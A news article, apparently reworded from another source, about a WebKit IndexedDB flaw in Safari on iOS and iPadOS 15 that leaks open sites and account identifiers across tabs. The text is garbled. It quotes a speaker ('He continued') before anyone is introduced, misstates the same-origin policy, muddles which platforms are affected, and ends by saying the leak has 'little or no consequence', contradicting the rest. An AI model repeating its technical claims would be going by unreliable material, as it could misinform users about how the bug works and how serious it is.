Safari and iOS users: Your browsing activity is being leaked in real time



Apple has violated one of the Internet's most sacrosanct security policies for the past four months. A bug leaks user identities and browsing activity in real time.

The same-origin policy forbids documents, script, or other content from being loaded from one origin to another. If this policy is not in place, a malicious site could gain access to login credentials for a trusted site when it is open in a different browser window or tab.

Privacy violation.

Research published last week found that the policy has been broken since the release of the new operating systems. It is trivial for one site to learn the domain of sites open in other tabs and windows, as well as user IDs and other identifying information associated with the other sites.

The fact that database names leak across different origins is an obvious privacy violation. He continued.

It allows websites to know what websites the user visits in different tabs. This is possible because database names are unique. In some cases, websites use unique user-specific identifiers in their database names. This means that users can be identified.

Attacks work on any browser that runs on the iPadOS 15 and on Macs. The demo shows that safarileaks.com is able to detect the presence of more than 20 websites in other tabs or windows. A real-world attacker could find hundreds or thousands of sites that can be detected.

The vulnerability can be exploited to reveal the visit and identify information in real time when users are logging in. The demo site can get the internal identification of each account when it's open elsewhere. The account holder can usually be identified with those identifiers.

Advertisement

Raising awareness.

The way the Webkit browser engine implements IndexedDB resulted in the leak. It works by creating databases when a new site is visited. Tabs or windows that are running in the background can continually query the indexed database. One site can learn what other websites a user is visiting in real time.

Any website can be opened in a pop-up window in order to cause a leak for a specific site. A site can open another site in order to cause an indexedDB based leak if the popup is embedded into its code.

Every time a website interacts with a database, a new empty database with the same name is created in all other active frames, tabs, and windows within the same browser session. Unless you switch to a different profile in Chrome or open a private window, Windows and tabs usually share the same session.

In real time, how IndexedDB leaks your browsing activity.

Bajanik said that he notified Apple of the vulnerability in late November, but it still hasn't been fixed in either of the company's mobile OSes. Apple representatives didn't respond to an email asking when a patch would be released. As of Monday, Apple engineers had merged potential fixes and marked Bajanik's report as resolved. End users won't be protected until the Webkit fix is included in the browsers.

People should be cautious when using any browser on iPadOS or any other mobile device. This isn't helpful for users of the iPad or iPhone, and there's little or no consequence of browsing activities being leaked. The specific sites visited and the order in which they were accessed can say a lot.

Updating your browser or OS is the only real protection, Bajanik wrote. We hope this article will raise awareness of this issue.